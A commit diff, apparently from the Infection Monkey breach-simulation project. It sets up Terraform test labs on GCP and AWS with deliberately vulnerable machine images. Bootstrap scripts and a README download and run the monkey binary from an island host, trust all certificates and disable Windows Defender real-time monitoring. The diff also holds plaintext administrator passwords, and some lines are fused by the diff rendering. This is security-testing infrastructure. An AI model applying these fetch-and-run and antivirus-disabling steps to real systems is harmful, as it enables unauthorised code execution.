+      <td><strong>Windows Server 2019 x64</strong></td>
+    </tr>
+    <tr class="odd">
+      <td>Default services port:</td>
+      <td>445</td>
+    </tr>
+    <tr class="even">
+      <td>Root password:</td>
+      <td>t67TC5ZDmz</td>
+    </tr>
+    <tr class="odd">
+      <td>Servers config:</td>
+      <td>Default</td>
+    </tr>
+    <tr class="even">
+      <td>Notes:</td>
+      <td>Accessible only through Nr.10</td>
+    </tr>
+  </tbody>
+</table>
+
 <table>
   <thead>
     <tr class="header">

View File

@@ -2,7 +2,7 @@ provider "google" {
   project = "test-000000"
   region = "europe-west3"
   zone = "europe-west3-b"
-  credentials = "${file("../gcp_keys/gcp_key.json")}"
+  credentials = file("../gcp_keys/gcp_key.json")
 }

 locals {
   resource_prefix = ""

View File

@@ -1,6 +1,6 @@
 resource "google_compute_firewall" "islands-in" {
   name = "${local.resource_prefix}islands-in"
-  network = "${google_compute_network.monkeyzoo.name}"
+  network = google_compute_network.monkeyzoo.name

   allow {
     protocol = "tcp"
@@ -14,7 +14,7 @@ resource "google_compute_firewall" "islands-in" {
 resource "google_compute_firewall" "islands-out" {
   name = "${local.resource_prefix}islands-out"
-  network = "${google_compute_network.monkeyzoo.name}"
+  network = google_compute_network.monkeyzoo.name

   allow {
     protocol = "tcp"
@@ -27,7 +27,7 @@ resource "google_compute_firewall" "islands-out" {
 resource "google_compute_firewall" "monkeyzoo-in" {
   name = "${local.resource_prefix}monkeyzoo-in"
-  network = "${google_compute_network.monkeyzoo.name}"
+  network = google_compute_network.monkeyzoo.name

   allow {
     protocol = "all"
@@ -35,12 +35,12 @@ resource "google_compute_firewall" "monkeyzoo-in" {
   direction = "INGRESS"
   priority = "65534"
-  source_ranges = ["10.2.2.0/24", "10.2.1.0/27"]
+  source_ranges = ["10.2.2.0/24"]
 }

 resource "google_compute_firewall" "monkeyzoo-out" {
   name = "${local.resource_prefix}monkeyzoo-out"
-  network = "${google_compute_network.monkeyzoo.name}"
+  network = google_compute_network.monkeyzoo.name

   allow {
     protocol = "all"
@@ -48,52 +48,53 @@ resource "google_compute_firewall" "monkeyzoo-out" {
   direction = "EGRESS"
   priority = "65534"
-  destination_ranges = ["10.2.2.0/24", "10.2.1.0/27"]
+  destination_ranges = ["10.2.2.0/24"]
 }

 resource "google_compute_firewall" "tunneling-in" {
   name = "${local.resource_prefix}tunneling-in"
-  network = "${google_compute_network.tunneling.name}"
+  network = google_compute_network.tunneling.name

   allow {
     protocol = "all"
   }
   direction = "INGRESS"
-  source_ranges = ["10.2.2.0/24", "10.2.0.0/28"]
+  source_ranges = ["10.2.1.0/24"]
 }

 resource "google_compute_firewall" "tunneling-out" {
   name = "${local.resource_prefix}tunneling-out"
-  network = "${google_compute_network.tunneling.name}"
+  network = google_compute_network.tunneling.name

   allow {
     protocol = "all"
   }
   direction = "EGRESS"
-  destination_ranges = ["10.2.2.0/24", "10.2.0.0/28"]
+  destination_ranges = ["10.2.1.0/24"]
 }

 resource "google_compute_firewall" "tunneling2-in" {
   name = "${local.resource_prefix}tunneling2-in"
-  network = "${google_compute_network.tunneling2.name}"
+  network = google_compute_network.tunneling2.name

   allow {
     protocol = "all"
   }
   direction = "INGRESS"
-  source_ranges = ["10.2.1.0/27"]
+  source_ranges = ["10.2.0.0/24"]
 }

 resource "google_compute_firewall" "tunneling2-out" {
   name = "${local.resource_prefix}tunneling2-out"
-  network = "${google_compute_network.tunneling2.name}"
+  network = google_compute_network.tunneling2.name

   allow {
     protocol = "all"
   }
   direction = "EGRESS"
-  destination_ranges = ["10.2.1.0/27"]
+  destination_ranges = ["10.2.0.0/24"]
 }

View File

@@ -1,19 +1,19 @@
 //Custom cloud images
 data "google_compute_image" "hadoop-2" {
   name = "hadoop-2"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "hadoop-3" {
   name = "hadoop-3"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "elastic-4" {
   name = "elastic-4"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "elastic-5" {
   name = "elastic-5"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 /*
@@ -23,73 +23,73 @@ data "google_compute_image" "sambacry-6" {
 */

 data "google_compute_image" "shellshock-8" {
   name = "shellshock-8"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "tunneling-9" {
   name = "tunneling-9"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "tunneling-10" {
   name = "tunneling-10"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "tunneling-11" {
   name = "tunneling-11"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "sshkeys-11" {
   name = "sshkeys-11"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "sshkeys-12" {
   name = "sshkeys-12"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "mimikatz-14" {
   name = "mimikatz-14"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "mimikatz-15" {
   name = "mimikatz-15"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "mssql-16" {
   name = "mssql-16"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "weblogic-18" {
   name = "weblogic-18"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "weblogic-19" {
   name = "weblogic-19"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "smb-20" {
   name = "smb-20"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "scan-21" {
   name = "scan-21"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "scan-22" {
   name = "scan-22"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "struts2-23" {
   name = "struts2-23"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "struts2-24" {
   name = "struts2-24"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "island-linux-250" {
   name = "island-linux-250"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

 data "google_compute_image" "island-windows-251" {
   name = "island-windows-251"
-  project = "${local.monkeyzoo_project}"
+  project = local.monkeyzoo_project
 }

View File

@@ -1,8 +1,8 @@
 // Local variables
 locals {
-  default_ubuntu="${google_compute_instance_template.ubuntu16.self_link}"
-  default_windows="${google_compute_instance_template.windows2016.self_link}"
+  default_ubuntu=google_compute_instance_template.ubuntu16.self_link
+  default_windows=google_compute_instance_template.windows2016.self_link
 }

 resource "google_compute_network" "monkeyzoo" {
@@ -23,27 +23,27 @@ resource "google_compute_network" "tunneling2" {
 resource "google_compute_subnetwork" "monkeyzoo-main" {
   name          = "${local.resource_prefix}monkeyzoo-main"
   ip_cidr_range = "10.2.2.0/24"
-  network       = "${google_compute_network.monkeyzoo.self_link}"
+  network       = google_compute_network.monkeyzoo.self_link
 }

 resource "google_compute_subnetwork" "tunneling-main" {
   name          = "${local.resource_prefix}tunneling-main"
   ip_cidr_range = "10.2.1.0/28"
-  network       = "${google_compute_network.tunneling.self_link}"
+  network       = google_compute_network.tunneling.self_link
 }

 resource "google_compute_subnetwork" "tunneling2-main" {
   name          = "${local.resource_prefix}tunneling2-main"
   ip_cidr_range = "10.2.0.0/27"
-  network       = "${google_compute_network.tunneling2.self_link}"
+  network       = google_compute_network.tunneling2.self_link
 }

 resource "google_compute_instance_from_template" "hadoop-2" {
   name = "${local.resource_prefix}hadoop-2"
-  source_instance_template = "${local.default_ubuntu}"
+  source_instance_template = local.default_ubuntu
   boot_disk{
     initialize_params {
-      image = "${data.google_compute_image.hadoop-2.self_link}"
+      image = data.google_compute_image.hadoop-2.self_link
     }
     auto_delete = true
   }
@@ -57,10 +57,10 @@ resource "google_compute_instance_from_template" "hadoop-2" {
 resource "google_compute_instance_from_template" "hadoop-3" {
   name = "${local.resource_prefix}hadoop-3"
-  source_instance_template = "${local.default_windows}"
+  source_instance_template = local.default_windows
   boot_disk{
     initialize_params {
-      image = "${data.google_compute_image.hadoop-3.self_link}"
+      image = data.google_compute_image.hadoop-3.self_link
     }
     auto_delete = true
   }
@@ -72,10 +72,10 @@ resource "google_compute_instance_from_template" "hadoop-3" {
 resource "google_compute_instance_from_template" "elastic-4" {
   name = "${local.resource_prefix}elastic-4"
-  source_instance_template = "${local.default_ubuntu}"
+  source_instance_template = local.default_ubuntu
   boot_disk{
     initialize_params {
-      image = "${data.google_compute_image.elastic-4.self_link}"
+      image = data.google_compute_image.elastic-4.self_link
     }
     auto_delete = true
   }
@@ -87,10 +87,10 @@ resource "google_compute_instance_from_template" "elastic-4" {
 resource "google_compute_instance_from_template" "elastic-5" {
   name = "${local.resource_prefix}elastic-5"
-  source_instance_template = "${local.default_windows}"
+  source_instance_template = local.default_windows
   boot_disk{
     initialize_params {
-      image = "${data.google_compute_image.elastic-5.self_link}"
+      image = data.google_compute_image.elastic-5.self_link
     }
     auto_delete = true
   }
@@ -135,10 +135,10 @@ resource "google_compute_instance_from_template" "sambacry-7" {
 resource "google_compute_instance_from_template" "shellshock-8" {
   name = "${local.resource_prefix}shellshock-8"
-  source_instance_template = "${local.default_ubuntu}"
+  source_instance_template = local.default_ubuntu
   boot_disk{
     initialize_params {
-      image = "${data.google_compute_image.shellshock-8.self_link}"
+      image = data.google_compute_image.shellshock-8.self_link
     }
     auto_delete = true
   }
@@ -150,10 +150,10 @@ resource "google_compute_instance_from_template" "shellshock-8" {
 resource "google_compute_instance_from_template" "tunneling-9" {
   name = "${local.resource_prefix}tunneling-9"
-  source_instance_template = "${local.default_ubuntu}"
+  source_instance_template = local.default_ubuntu
   boot_disk{
     initialize_params {
-      image = "${data.google_compute_image.tunneling-9.self_link}"
+      image = data.google_compute_image.tunneling-9.self_link
     }
     auto_delete = true
   }
@@ -169,10 +169,10 @@ resource "google_compute_instance_from_template" "tunneling-9" {
 resource "google_compute_instance_from_template" "tunneling-10" {
   name = "${local.resource_prefix}tunneling-10"
-  source_instance_template = "${local.default_ubuntu}"
+  source_instance_template = local.default_ubuntu
   boot_disk{
     initialize_params {
-      image = "${data.google_compute_image.tunneling-10.self_link}"
+      image = data.google_compute_image.tunneling-10.self_link
     }
     auto_delete = true
   }
@@ -188,10 +188,10 @@ resource "google_compute_instance_from_template" "tunneling-10" {
 resource "google_compute_instance_from_template" "tunneling-11" {
   name = "${local.resource_prefix}tunneling-11"
-  source_instance_template = "${local.default_ubuntu}"
+  source_instance_template = local.default_ubuntu
   boot_disk{
     initialize_params {
-      image = "${data.google_compute_image.tunneling-11.self_link}"
+      image = data.google_compute_image.tunneling-11.self_link
     }
     auto_delete = true
   }
@@ -201,12 +201,27 @@ resource "google_compute_instance_from_template" "tunneling-11" {
   }
 }

-resource "google_compute_instance_from_template" "sshkeys-11" {
-  name = "${local.resource_prefix}sshkeys-11"
-  source_instance_template = "${local.default_ubuntu}"
+resource "google_compute_instance_from_template" "tunneling-12" {
+  name = "${local.resource_prefix}tunneling-12"
+  source_instance_template = local.default_windows
   boot_disk{
     initialize_params {
-      image = "${data.google_compute_image.sshkeys-11.self_link}"
+      image = data.google_compute_image.tunneling-12.self_link
+    }
+    auto_delete = true
+  }
+  network_interface{
+    subnetwork="${local.resource_prefix}tunneling2-main"
+    network_ip="10.2.0.12"
+  }
+}
+
+resource "google_compute_instance_from_template" "sshkeys-11" {
name = "${local.resource_prefix}sshkeys-11"
source_instance_template = local.default_ubuntu
boot_disk{
initialize_params {
image = data.google_compute_image.sshkeys-11.self_link
} }
auto_delete = true auto_delete = true
} }
@ -218,10 +233,10 @@ resource "google_compute_instance_from_template" "sshkeys-11" {
resource "google_compute_instance_from_template" "sshkeys-12" { resource "google_compute_instance_from_template" "sshkeys-12" {
name = "${local.resource_prefix}sshkeys-12" name = "${local.resource_prefix}sshkeys-12"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.sshkeys-12.self_link}" image = data.google_compute_image.sshkeys-12.self_link
} }
auto_delete = true auto_delete = true
} }
@ -249,10 +264,10 @@ resource "google_compute_instance_from_template" "rdpgrinder-13" {
resource "google_compute_instance_from_template" "mimikatz-14" { resource "google_compute_instance_from_template" "mimikatz-14" {
name = "${local.resource_prefix}mimikatz-14" name = "${local.resource_prefix}mimikatz-14"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.mimikatz-14.self_link}" image = data.google_compute_image.mimikatz-14.self_link
} }
auto_delete = true auto_delete = true
} }
@ -264,10 +279,10 @@ resource "google_compute_instance_from_template" "mimikatz-14" {
resource "google_compute_instance_from_template" "mimikatz-15" { resource "google_compute_instance_from_template" "mimikatz-15" {
name = "${local.resource_prefix}mimikatz-15" name = "${local.resource_prefix}mimikatz-15"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.mimikatz-15.self_link}" image = data.google_compute_image.mimikatz-15.self_link
} }
auto_delete = true auto_delete = true
} }
@ -279,10 +294,10 @@ resource "google_compute_instance_from_template" "mimikatz-15" {
resource "google_compute_instance_from_template" "mssql-16" { resource "google_compute_instance_from_template" "mssql-16" {
name = "${local.resource_prefix}mssql-16" name = "${local.resource_prefix}mssql-16"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.mssql-16.self_link}" image = data.google_compute_image.mssql-16.self_link
} }
auto_delete = true auto_delete = true
} }
@ -314,10 +329,10 @@ resource "google_compute_instance_from_template" "upgrader-17" {
resource "google_compute_instance_from_template" "weblogic-18" { resource "google_compute_instance_from_template" "weblogic-18" {
name = "${local.resource_prefix}weblogic-18" name = "${local.resource_prefix}weblogic-18"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.weblogic-18.self_link}" image = data.google_compute_image.weblogic-18.self_link
} }
auto_delete = true auto_delete = true
} }
@ -329,10 +344,10 @@ resource "google_compute_instance_from_template" "weblogic-18" {
resource "google_compute_instance_from_template" "weblogic-19" { resource "google_compute_instance_from_template" "weblogic-19" {
name = "${local.resource_prefix}weblogic-19" name = "${local.resource_prefix}weblogic-19"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.weblogic-19.self_link}" image = data.google_compute_image.weblogic-19.self_link
} }
auto_delete = true auto_delete = true
} }
@ -344,10 +359,10 @@ resource "google_compute_instance_from_template" "weblogic-19" {
resource "google_compute_instance_from_template" "smb-20" { resource "google_compute_instance_from_template" "smb-20" {
name = "${local.resource_prefix}smb-20" name = "${local.resource_prefix}smb-20"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.smb-20.self_link}" image = data.google_compute_image.smb-20.self_link
} }
auto_delete = true auto_delete = true
} }
@ -359,10 +374,10 @@ resource "google_compute_instance_from_template" "smb-20" {
resource "google_compute_instance_from_template" "scan-21" { resource "google_compute_instance_from_template" "scan-21" {
name = "${local.resource_prefix}scan-21" name = "${local.resource_prefix}scan-21"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.scan-21.self_link}" image = data.google_compute_image.scan-21.self_link
} }
auto_delete = true auto_delete = true
} }
@ -374,10 +389,10 @@ resource "google_compute_instance_from_template" "scan-21" {
resource "google_compute_instance_from_template" "scan-22" { resource "google_compute_instance_from_template" "scan-22" {
name = "${local.resource_prefix}scan-22" name = "${local.resource_prefix}scan-22"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.scan-22.self_link}" image = data.google_compute_image.scan-22.self_link
} }
auto_delete = true auto_delete = true
} }
@ -389,10 +404,10 @@ resource "google_compute_instance_from_template" "scan-22" {
resource "google_compute_instance_from_template" "struts2-23" { resource "google_compute_instance_from_template" "struts2-23" {
name = "${local.resource_prefix}struts2-23" name = "${local.resource_prefix}struts2-23"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.struts2-23.self_link}" image = data.google_compute_image.struts2-23.self_link
} }
auto_delete = true auto_delete = true
} }
@ -404,10 +419,10 @@ resource "google_compute_instance_from_template" "struts2-23" {
resource "google_compute_instance_from_template" "struts2-24" { resource "google_compute_instance_from_template" "struts2-24" {
name = "${local.resource_prefix}struts2-24" name = "${local.resource_prefix}struts2-24"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.struts2-24.self_link}" image = data.google_compute_image.struts2-24.self_link
} }
auto_delete = true auto_delete = true
} }
@ -421,10 +436,10 @@ resource "google_compute_instance_from_template" "island-linux-250" {
name = "${local.resource_prefix}island-linux-250" name = "${local.resource_prefix}island-linux-250"
machine_type = "n1-standard-2" machine_type = "n1-standard-2"
tags = ["island", "linux", "ubuntu16"] tags = ["island", "linux", "ubuntu16"]
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.island-linux-250.self_link}" image = data.google_compute_image.island-linux-250.self_link
} }
auto_delete = true auto_delete = true
} }
@ -442,10 +457,10 @@ resource "google_compute_instance_from_template" "island-windows-251" {
name = "${local.resource_prefix}island-windows-251" name = "${local.resource_prefix}island-windows-251"
machine_type = "n1-standard-2" machine_type = "n1-standard-2"
tags = ["island", "windows", "windowsserver2016"] tags = ["island", "windows", "windowsserver2016"]
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.island-windows-251.self_link}" image = data.google_compute_image.island-windows-251.self_link
} }
auto_delete = true auto_delete = true
} }
@ -18,7 +18,7 @@ resource "google_compute_instance_template" "ubuntu16" {
     }
   }
   service_account {
-    email ="${local.service_account_email}"
+    email =local.service_account_email
     scopes=["cloud-platform"]
   }
 }
@ -39,7 +39,7 @@ resource "google_compute_instance_template" "windows2016" {
     subnetwork="monkeyzoo-main"
   }
   service_account {
-    email="${local.service_account_email}"
+    email=local.service_account_email
     scopes=["cloud-platform"]
   }
 }
@ -0,0 +1,79 @@
# OS compatibility
## About
OS compatibility is an AWS environment designed to test
Monkey binary compatibility on different operating systems.
This environment is deployed using the Terraform scripts
located in this directory.
## Setup
To set up, put the `accessKeys` file into the `./aws_keys` directory.
The contents of the `accessKeys` file should be as follows:
```
[default]
aws_access_key_id = <...>
aws_secret_access_key = <...>
```
Also review the `./terraform/config.tf` file.
Launch the environment by going into the `terraform` folder and running
```shell
terraform init
terraform apply
```
## Usage
0. Add your machine's IP to the `os_compat_island` security group ingress rules.
1. Launch the os_compat_ISLAND machine, upload your binaries/update the island, and reset the island environment.
2. Launch/reboot all the other os_compat test machines (these can be filtered with the tag "Purpose: os_compat_instance").
3. Wait until the machines boot and run the monkey.
4. Launch the `test_compatibility.py` pytest script with the island IP parameter
(e.g. `test_compatibility.py --island 111.111.111.111:5000`)
## Machines
Since the island machine is built from a custom AMI, it already has the following credentials:
Administrator: %tPHGz8ZuQsBnEUgdpz!6f&elGnFy?;.
For windows_2008_r2 Administrator:AGE(MP..txL
The following machines do not download the monkey automatically, so you'll have to check them manually:
- os_compat_kali_2019
- os_compat_oracle_6
- os_compat_oracle_7
- windows_2003_r2_32
- windows_2003
- windows_2008_r2
A quick reference for usernames on different machines (if in doubt, check the official docs):
- Ubuntu: ubuntu
- Oracle: clckwrk
- CentOS: centos
- Everything else: ec2-user
To manually verify that a machine is compatible, use the following commands to download and execute the monkey.
Also, add your IP to the `os_compat_instance` security group.
Example commands:
- Powershell:
```powershell
# The TrustAllCertsPolicy type must be defined first (see the add-type block in the Windows user data in main.tf).
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/monkey/download/monkey-windows-64.exe' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
```
- Bash:
```shell
wget --no-check-certificate -q https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -k -o monkey-linux-64
chmod +x ./monkey-linux-64
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
```
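Before kicking off the pytest run in step 4, it can be worth confirming that the island actually answers on its port. A minimal, hypothetical check (the island serves HTTPS with a self-signed certificate, hence verification is disabled):

```python
import ssl
import urllib.request


def island_is_up(address: str) -> bool:
    # Probe the island root over HTTPS; skip certificate verification
    # because the island uses a self-signed certificate.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    try:
        urllib.request.urlopen("https://{}/".format(address), timeout=5, context=ctx)
        return True
    except OSError:  # URLError, ConnectionRefusedError, timeouts
        return False
```

This is only a reachability probe, not part of the test suite; `island_is_up` is a made-up helper name.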
@ -0,0 +1,4 @@
# Ignore everything in this directory
*
# Except this file
!.gitignore
@ -0,0 +1,11 @@
import pytest


def pytest_addoption(parser):
    parser.addoption("--island", action="store", default="",
                     help="Specify the Monkey Island address (host+port).")


@pytest.fixture(scope='module')
def island(request):
    return request.config.getoption("--island")
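The `--island` value is a single `host:port` string (e.g. `111.111.111.111:5000`). A consumer that needs the parts separately can split it like this; `parse_island_address` is a hypothetical helper, not part of the codebase:

```python
def parse_island_address(island: str, default_port: int = 5000):
    # Split the "host:port" string passed via --island; fall back to the
    # island's default port (5000) when no port is given.
    host, _, port = island.partition(":")
    return host, int(port) if port else default_port


print(parse_island_address("111.111.111.111:5000"))  # ('111.111.111.111', 5000)
```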
@ -0,0 +1,5 @@
provider "aws" {
version = "~> 2.0"
region = "eu-central-1"
shared_credentials_file = "../aws_keys/accessKeys"
}
@ -0,0 +1,92 @@
resource "aws_vpc" "os_compat_vpc" {
cidr_block = "10.0.0.0/24"
enable_dns_support = true
tags = {
Name = "os_compat_vpc"
}
}
resource "aws_internet_gateway" "os_compat_gateway" {
vpc_id = "${aws_vpc.os_compat_vpc.id}"
tags = {
Name = "os_compat_gateway"
}
}
// create routing table which points to the internet gateway
resource "aws_route_table" "os_compat_route" {
vpc_id = "${aws_vpc.os_compat_vpc.id}"
route {
cidr_block = "0.0.0.0/0"
gateway_id = "${aws_internet_gateway.os_compat_gateway.id}"
}
tags = {
Name = "os_compat_route"
}
}
// associate the routing table with the subnet
resource "aws_route_table_association" "subnet-association" {
subnet_id = "${aws_subnet.main.id}"
route_table_id = "${aws_route_table.os_compat_route.id}"
}
resource "aws_subnet" "main" {
vpc_id = "${aws_vpc.os_compat_vpc.id}"
cidr_block = "10.0.0.0/24"
tags = {
Name = "Main"
}
}
resource "aws_security_group" "os_compat_island" {
name = "os_compat_island"
description = "Allow remote access to the island"
vpc_id = "${aws_vpc.os_compat_vpc.id}"
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["10.0.0.0/24"]
}
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
tags = {
Name = "os_compat_island"
}
}
resource "aws_security_group" "os_compat_instance" {
name = "os_compat_instance"
description = "Allow remote access to the machines"
vpc_id = "${aws_vpc.os_compat_vpc.id}"
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["10.0.0.0/24"]
}
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
tags = {
Name = "os_compat_instance"
}
}
@ -0,0 +1,14 @@
resource "aws_instance" "os_test_machine" {
ami = "${var.ami}"
instance_type = "${var.type}"
private_ip = "${var.ip}"
subnet_id = "${data.aws_subnet.main.id}"
key_name = "os_compat"
tags = {
Name = "os_compat_${var.name}"
Purpose = "os_compat_instance"
}
vpc_security_group_ids = ["${data.aws_security_group.os_compat_instance.id}"]
associate_public_ip_address = true
user_data = "${var.user_data}"
}
@ -0,0 +1,25 @@
variable "ami" {type=string}
variable "ip" {type=string}
variable "name" {type=string}
variable "type" {
type=string
default="t2.micro"
}
variable "user_data" {
type=string
default=""
}
variable "env_vars" {
type = object({
subnet_id = string
vpc_security_group_ids = string
})
}
data "aws_subnet" "main" {
id = "${var.env_vars.subnet_id}"
}
data "aws_security_group" "os_compat_instance" {
id = "${var.env_vars.vpc_security_group_ids}"
}
@ -0,0 +1,371 @@
// Instances of machines in os_compat environment
// !!! Don't forget to add machines to test_compatibility.py if you add here !!!
resource "aws_instance" "island" {
ami = "ami-004f0217ce761fc9a"
instance_type = "t2.micro"
private_ip = "10.0.0.251"
subnet_id = "${aws_subnet.main.id}"
key_name = "os_compat"
tags = {
Name = "os_compat_ISLAND"
}
vpc_security_group_ids = ["${aws_security_group.os_compat_island.id}"]
associate_public_ip_address = true
root_block_device {
volume_size = "30"
volume_type = "standard"
delete_on_termination = true
}
}
locals {
env_vars = {
subnet_id = "${aws_subnet.main.id}"
vpc_security_group_ids = "${aws_security_group.os_compat_instance.id}"
}
user_data_linux_64 = <<EOF
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
rm ./monkey-linux-64
wget --no-check-certificate -q https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -O ./monkey-linux-64 || curl https://10.0.0.251:5000/api/monkey/download/monkey-linux-64 -k -o monkey-linux-64
chmod +x ./monkey-linux-64
./monkey-linux-64 m0nk3y -s 10.0.0.251:5000
--//
EOF
user_data_linux_32 = <<EOF
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
rm ./monkey-linux-32
wget --no-check-certificate -q https://10.0.0.251:5000/api/monkey/download/monkey-linux-32 -O ./monkey-linux-32 || curl https://10.0.0.251:5000/api/monkey/download/monkey-linux-32 -k -o monkey-linux-32
chmod +x ./monkey-linux-32
./monkey-linux-32 m0nk3y -s 10.0.0.251:5000
--//
EOF
user_data_windows_64 = <<EOF
<powershell>
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/monkey/download/monkey-windows-64.exe' -OutFile 'C:\windows\temp\monkey-windows-64.exe' -UseBasicParsing
C:\windows\temp\monkey-windows-64.exe m0nk3y -s 10.0.0.251:5000
</powershell>
<persist>true</persist>
EOF
user_data_windows_32 = <<EOF
<powershell>
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri 'https://10.0.0.251:5000/api/monkey/download/monkey-windows-32.exe' -OutFile 'C:\windows\temp\monkey-windows-32.exe' -UseBasicParsing
C:\windows\temp\monkey-windows-32.exe m0nk3y -s 10.0.0.251:5000
</powershell>
<persist>true</persist>
EOF
}
module "centos_6" {
source = "./instance_template"
name = "centos_6"
ami = "ami-07fa74e425f2abf29"
ip = "10.0.0.36"
env_vars = "${local.env_vars}"
user_data = "${local.user_data_linux_64}"
}
module "centos_7" {
source = "./instance_template"
name = "centos_7"
ami = "ami-0034b52a39b9fb0e8"
ip = "10.0.0.37"
env_vars = "${local.env_vars}"
